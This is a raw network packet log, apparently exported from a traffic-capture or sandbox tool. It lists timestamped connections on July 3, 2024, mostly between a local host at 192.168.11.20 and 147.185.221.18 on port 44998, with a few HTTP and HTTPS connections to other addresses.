                            Jul 3, 2024 15:50:34.732182026 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:34.732194901 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:34.732206106 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:34.732215881 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:34.732227087 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:34.732237101 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:34.732248068 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:34.732258081 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:34.732269049 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:34.732278109 CEST4973544998192.168.11.20147.185.221.18
                            Jul 3, 2024 15:50:34.732279062 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:34.732290030 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:34.732299089 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:34.732310057 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:34.732320070 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:34.732434034 CEST4973544998192.168.11.20147.185.221.18
                            Jul 3, 2024 15:50:34.732472897 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:34.732490063 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:34.732507944 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:34.732522964 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:34.732541084 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:34.732629061 CEST4973544998192.168.11.20147.185.221.18
                            Jul 3, 2024 15:50:34.732713938 CEST4973544998192.168.11.20147.185.221.18
                            Jul 3, 2024 15:50:34.898840904 CEST44349742104.20.3.235192.168.11.20
                            Jul 3, 2024 15:50:34.898978949 CEST44349742104.20.3.235192.168.11.20
                            Jul 3, 2024 15:50:34.899188042 CEST49742443192.168.11.20104.20.3.235
                            Jul 3, 2024 15:50:34.900820017 CEST49742443192.168.11.20104.20.3.235
                            Jul 3, 2024 15:50:34.901645899 CEST4974344998192.168.11.20147.185.221.18
                            Jul 3, 2024 15:50:35.039184093 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:35.039268970 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:35.039401054 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:35.039416075 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:35.039427042 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:35.039438009 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:35.039448977 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:35.039520979 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:35.039532900 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:35.039721966 CEST4973544998192.168.11.20147.185.221.18
                            Jul 3, 2024 15:50:35.039766073 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:35.039819002 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:35.039829969 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:35.039931059 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:35.039943933 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:35.039954901 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:35.039964914 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:35.039975882 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:35.039985895 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:35.040132046 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:35.040162086 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:35.040162086 CEST4973544998192.168.11.20147.185.221.18
                            Jul 3, 2024 15:50:35.040185928 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:35.040199041 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:35.040222883 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:35.040235043 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:35.040292025 CEST4973544998192.168.11.20147.185.221.18
                            Jul 3, 2024 15:50:35.040409088 CEST4973544998192.168.11.20147.185.221.18
                            Jul 3, 2024 15:50:35.040427923 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:35.040441036 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:35.040452003 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:35.040462971 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:35.040473938 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:35.040484905 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:35.040494919 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:35.040505886 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:35.040517092 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:35.040527105 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:35.040538073 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:35.040548086 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:35.040559053 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:35.040569067 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:35.040580034 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:35.040590048 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:35.040601015 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:35.040604115 CEST4973544998192.168.11.20147.185.221.18
                            Jul 3, 2024 15:50:35.040657043 CEST4973544998192.168.11.20147.185.221.18
                            Jul 3, 2024 15:50:35.040704966 CEST4973544998192.168.11.20147.185.221.18
                            Jul 3, 2024 15:50:35.040838003 CEST4973544998192.168.11.20147.185.221.18
                            Jul 3, 2024 15:50:35.062714100 CEST4499849743147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:35.062886953 CEST4974344998192.168.11.20147.185.221.18
                            Jul 3, 2024 15:50:35.347382069 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:35.347398043 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:35.347409964 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:35.347556114 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:35.347569942 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:35.347580910 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:35.347592115 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:35.347599030 CEST4973544998192.168.11.20147.185.221.18
                            Jul 3, 2024 15:50:35.347601891 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:35.347613096 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:35.347623110 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:35.347785950 CEST4973544998192.168.11.20147.185.221.18
                            Jul 3, 2024 15:50:35.347862005 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:35.347877026 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:35.347950935 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:35.348009109 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:35.348021030 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:35.348031044 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:35.348042965 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:35.348052979 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:35.348062992 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:35.348073959 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:35.348084927 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:35.348162889 CEST4973544998192.168.11.20147.185.221.18
                            Jul 3, 2024 15:50:35.348167896 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:35.348221064 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:35.348246098 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:35.348274946 CEST4973544998192.168.11.20147.185.221.18
                            Jul 3, 2024 15:50:35.348301888 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:35.348315001 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:35.348356962 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:35.348368883 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:35.348382950 CEST4973544998192.168.11.20147.185.221.18
                            Jul 3, 2024 15:50:35.348474979 CEST4973544998192.168.11.20147.185.221.18
                            Jul 3, 2024 15:50:35.348634005 CEST4973544998192.168.11.20147.185.221.18
                            Jul 3, 2024 15:50:35.348678112 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:35.348725080 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:35.348798990 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:35.348853111 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:35.348864079 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:35.348875046 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:35.348886013 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:35.348907948 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:35.348918915 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:35.348929882 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:35.348953009 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:35.348953962 CEST4973544998192.168.11.20147.185.221.18
                            Jul 3, 2024 15:50:35.348963976 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:35.348973989 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:35.348984957 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:35.348994970 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:35.349020958 CEST4973544998192.168.11.20147.185.221.18
                            Jul 3, 2024 15:50:35.350162983 CEST4973544998192.168.11.20147.185.221.18
                            Jul 3, 2024 15:50:35.350162983 CEST4973544998192.168.11.20147.185.221.18
                            Jul 3, 2024 15:50:35.511939049 CEST4499849743147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:35.633883953 CEST4974480192.168.11.20104.16.185.241
                            Jul 3, 2024 15:50:35.651757002 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:35.652626038 CEST4973544998192.168.11.20147.185.221.18
                            Jul 3, 2024 15:50:35.655199051 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:35.655213118 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:35.655303001 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:35.655317068 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:35.655428886 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:35.655442953 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:35.655453920 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:35.655463934 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:35.655474901 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:35.655488014 CEST4973544998192.168.11.20147.185.221.18
                            Jul 3, 2024 15:50:35.655555010 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:35.655569077 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:35.655580997 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:35.655591011 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:35.655601978 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:35.655636072 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:35.655689955 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:35.655786991 CEST4973544998192.168.11.20147.185.221.18
                            Jul 3, 2024 15:50:35.655786991 CEST4973544998192.168.11.20147.185.221.18
                            Jul 3, 2024 15:50:35.655955076 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:35.655966997 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:35.656013966 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:35.656069040 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:35.656080008 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:35.656090021 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:35.656100988 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:35.656121016 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:35.656131983 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:35.656137943 CEST4973544998192.168.11.20147.185.221.18
                            Jul 3, 2024 15:50:35.656141996 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:35.656152964 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:35.656162977 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:35.656241894 CEST4973544998192.168.11.20147.185.221.18
                            Jul 3, 2024 15:50:35.656275034 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:35.656286955 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:35.656375885 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:35.656385899 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:35.656462908 CEST4973544998192.168.11.20147.185.221.18
                            Jul 3, 2024 15:50:35.656471968 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:35.656526089 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:35.656553984 CEST4973544998192.168.11.20147.185.221.18
                            Jul 3, 2024 15:50:35.656599045 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:35.656651020 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:35.656724930 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:35.656779051 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:35.656797886 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:35.656800985 CEST4973544998192.168.11.20147.185.221.18
                            Jul 3, 2024 15:50:35.656810999 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:35.656904936 CEST4973544998192.168.11.20147.185.221.18
                            Jul 3, 2024 15:50:35.656981945 CEST4973544998192.168.11.20147.185.221.18
                            Jul 3, 2024 15:50:35.657515049 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:35.657639027 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:35.657748938 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:35.657761097 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:35.657818079 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:35.657829046 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:35.657840014 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:35.657855034 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:35.658370018 CEST4973544998192.168.11.20147.185.221.18
                            Jul 3, 2024 15:50:35.658370018 CEST4973544998192.168.11.20147.185.221.18
                            Jul 3, 2024 15:50:35.658370018 CEST4973544998192.168.11.20147.185.221.18
                            Jul 3, 2024 15:50:35.752648115 CEST8049744104.16.185.241192.168.11.20
                            Jul 3, 2024 15:50:35.752872944 CEST4974480192.168.11.20104.16.185.241
                            Jul 3, 2024 15:50:35.752938032 CEST4974480192.168.11.20104.16.185.241
                            Jul 3, 2024 15:50:35.871495008 CEST8049744104.16.185.241192.168.11.20
                            Jul 3, 2024 15:50:35.878719091 CEST8049744104.16.185.241192.168.11.20
                            Jul 3, 2024 15:50:35.881849051 CEST4974344998192.168.11.20147.185.221.18
                            Jul 3, 2024 15:50:35.925061941 CEST4974480192.168.11.20104.16.185.241
                            Jul 3, 2024 15:50:35.963232040 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:35.963253021 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:35.963430882 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:35.963447094 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:35.963464022 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:35.963566065 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:35.963596106 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:35.963681936 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:35.963699102 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:35.963715076 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:35.963731050 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:35.963776112 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:35.963792086 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:35.963807106 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:35.963823080 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:35.963839054 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:35.963855028 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:35.963937044 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:35.963967085 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:35.964052916 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:35.964070082 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:35.964087009 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:35.964103937 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:35.964121103 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:35.964138031 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:35.964152098 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:35.964287996 CEST4973544998192.168.11.20147.185.221.18
                            Jul 3, 2024 15:50:35.964287996 CEST4973544998192.168.11.20147.185.221.18
                            Jul 3, 2024 15:50:35.964287996 CEST4973544998192.168.11.20147.185.221.18
                            Jul 3, 2024 15:50:35.964287996 CEST4973544998192.168.11.20147.185.221.18
                            Jul 3, 2024 15:50:35.964612961 CEST4973544998192.168.11.20147.185.221.18
                            Jul 3, 2024 15:50:35.984476089 CEST4974544998192.168.11.20147.185.221.18
                            Jul 3, 2024 15:50:36.145541906 CEST4499849745147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:36.146526098 CEST4974544998192.168.11.20147.185.221.18
                            Jul 3, 2024 15:50:36.231318951 CEST4499849743147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:36.232511997 CEST4974344998192.168.11.20147.185.221.18
                            Jul 3, 2024 15:50:36.268136978 CEST4974544998192.168.11.20147.185.221.18
                            Jul 3, 2024 15:50:36.268136978 CEST4974544998192.168.11.20147.185.221.18
                            Jul 3, 2024 15:50:36.332142115 CEST4974144998192.168.11.20147.185.221.18
                            Jul 3, 2024 15:50:36.585890055 CEST4499849745147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:36.589626074 CEST4499849743147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:36.639029980 CEST4499849741147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:36.639489889 CEST4499849741147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:36.639616966 CEST4974144998192.168.11.20147.185.221.18
                            Jul 3, 2024 15:50:36.721818924 CEST4974544998192.168.11.20147.185.221.18
                            Jul 3, 2024 15:50:36.942841053 CEST4499849741147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:36.943962097 CEST4974144998192.168.11.20147.185.221.18
                            Jul 3, 2024 15:50:37.067779064 CEST4499849745147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:41.144073963 CEST4974044998192.168.11.20147.185.221.18
                            Jul 3, 2024 15:50:41.284305096 CEST4974544998192.168.11.20147.185.221.18
                            Jul 3, 2024 15:50:41.584666967 CEST4499849745147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:41.584999084 CEST4499849745147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:41.585563898 CEST4974544998192.168.11.20147.185.221.18
                            Jul 3, 2024 15:50:41.884473085 CEST4499849745147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:41.884687901 CEST4974544998192.168.11.20147.185.221.18
                            Jul 3, 2024 15:50:43.720833063 CEST4973544998192.168.11.20147.185.221.18
                            Jul 3, 2024 15:50:44.083297968 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:44.083568096 CEST4973544998192.168.11.20147.185.221.18
                            Jul 3, 2024 15:50:44.391305923 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:44.438878059 CEST4973544998192.168.11.20147.185.221.18
                            Jul 3, 2024 15:50:44.710027933 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:44.711250067 CEST4973544998192.168.11.20147.185.221.18
                            Jul 3, 2024 15:50:44.711741924 CEST4973544998192.168.11.20147.185.221.18
                            Jul 3, 2024 15:50:44.746392012 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:44.746603966 CEST4973544998192.168.11.20147.185.221.18
                            Jul 3, 2024 15:50:45.073311090 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:45.073465109 CEST4973544998192.168.11.20147.185.221.18
                            Jul 3, 2024 15:50:45.429722071 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:47.450995922 CEST4973544998192.168.11.20147.185.221.18
                            Jul 3, 2024 15:50:47.813076973 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:47.813251972 CEST4973544998192.168.11.20147.185.221.18
                            Jul 3, 2024 15:50:48.175443888 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:48.407228947 CEST4974344998192.168.11.20147.185.221.18
                            Jul 3, 2024 15:50:48.759242058 CEST4499849743147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:48.759542942 CEST4974344998192.168.11.20147.185.221.18
                            Jul 3, 2024 15:50:49.068212986 CEST4499849743147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:49.113656044 CEST4974344998192.168.11.20147.185.221.18
                            Jul 3, 2024 15:50:49.337409973 CEST4499849743147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:49.337666035 CEST4974344998192.168.11.20147.185.221.18
                            Jul 3, 2024 15:50:49.342850924 CEST4974344998192.168.11.20147.185.221.18
                            Jul 3, 2024 15:50:49.421807051 CEST4499849743147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:49.422038078 CEST4974344998192.168.11.20147.185.221.18
                            Jul 3, 2024 15:50:49.696809053 CEST4499849743147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:49.697045088 CEST4974344998192.168.11.20147.185.221.18
                            Jul 3, 2024 15:50:50.058058023 CEST4499849743147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:55.967680931 CEST4973544998192.168.11.20147.185.221.18
                            Jul 3, 2024 15:50:56.320456982 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:56.320637941 CEST4973544998192.168.11.20147.185.221.18
                            Jul 3, 2024 15:50:56.628686905 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:56.671588898 CEST4973544998192.168.11.20147.185.221.18
                            Jul 3, 2024 15:50:56.934257030 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:56.934429884 CEST4973544998192.168.11.20147.185.221.18
                            Jul 3, 2024 15:50:56.935273886 CEST4973544998192.168.11.20147.185.221.18
                            Jul 3, 2024 15:50:56.978981018 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:56.979162931 CEST4973544998192.168.11.20147.185.221.18
                            Jul 3, 2024 15:50:57.297364950 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:57.298316002 CEST4973544998192.168.11.20147.185.221.18
                            Jul 3, 2024 15:50:57.658714056 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:51:02.138194084 CEST4974344998192.168.11.20147.185.221.18
                            Jul 3, 2024 15:51:02.486270905 CEST4499849743147.185.221.18192.168.11.20
                            Jul 3, 2024 15:51:02.486438990 CEST4974344998192.168.11.20147.185.221.18
                            Jul 3, 2024 15:51:02.795517921 CEST4499849743147.185.221.18192.168.11.20
                            Jul 3, 2024 15:51:02.796473026 CEST4974344998192.168.11.20147.185.221.18
                            Jul 3, 2024 15:51:03.065557003 CEST4499849743147.185.221.18192.168.11.20
                            Jul 3, 2024 15:51:03.065876961 CEST4974344998192.168.11.20147.185.221.18
                            Jul 3, 2024 15:51:03.159648895 CEST4499849743147.185.221.18192.168.11.20
                            Jul 3, 2024 15:51:03.159856081 CEST4974344998192.168.11.20147.185.221.18
                            Jul 3, 2024 15:51:03.522253036 CEST4499849743147.185.221.18192.168.11.20
                            Jul 3, 2024 15:51:07.906347990 CEST4974344998192.168.11.20147.185.221.18
                            Jul 3, 2024 15:51:08.214973927 CEST4973544998192.168.11.20147.185.221.18
                            Jul 3, 2024 15:51:08.284332991 CEST4499849743147.185.221.18192.168.11.20
                            Jul 3, 2024 15:51:08.284513950 CEST4974344998192.168.11.20147.185.221.18
                            Jul 3, 2024 15:51:08.576549053 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:51:08.576709986 CEST4973544998192.168.11.20147.185.221.18
                            Jul 3, 2024 15:51:08.640782118 CEST4499849743147.185.221.18192.168.11.20
                            Jul 3, 2024 15:51:08.884596109 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:51:08.885529041 CEST4973544998192.168.11.20147.185.221.18
                            Jul 3, 2024 15:51:09.249331951 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:51:09.249485016 CEST4973544998192.168.11.20147.185.221.18
                            Jul 3, 2024 15:51:09.606491089 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:51:15.869524956 CEST4974344998192.168.11.20147.185.221.18
                            Jul 3, 2024 15:51:16.220769882 CEST4499849743147.185.221.18192.168.11.20
                            Jul 3, 2024 15:51:16.220912933 CEST4974344998192.168.11.20147.185.221.18
                            Jul 3, 2024 15:51:16.529398918 CEST4499849743147.185.221.18192.168.11.20
                            Jul 3, 2024 15:51:16.530359030 CEST4974344998192.168.11.20147.185.221.18
                            Jul 3, 2024 15:51:16.796709061 CEST4499849743147.185.221.18192.168.11.20
                            Jul 3, 2024 15:51:16.796895027 CEST4974344998192.168.11.20147.185.221.18
                            Jul 3, 2024 15:51:16.889795065 CEST4499849743147.185.221.18192.168.11.20
                            Jul 3, 2024 15:51:16.889988899 CEST4974344998192.168.11.20147.185.221.18
                            Jul 3, 2024 15:51:17.249522924 CEST4499849743147.185.221.18192.168.11.20
                            Jul 3, 2024 15:51:20.446630955 CEST4973544998192.168.11.20147.185.221.18
                            Jul 3, 2024 15:51:20.794075966 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:51:20.794331074 CEST4973544998192.168.11.20147.185.221.18
                            Jul 3, 2024 15:51:21.102660894 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:51:21.104037046 CEST4973544998192.168.11.20147.185.221.18
                            Jul 3, 2024 15:51:21.452824116 CEST4499849735147.185.221.18192.168.11.20
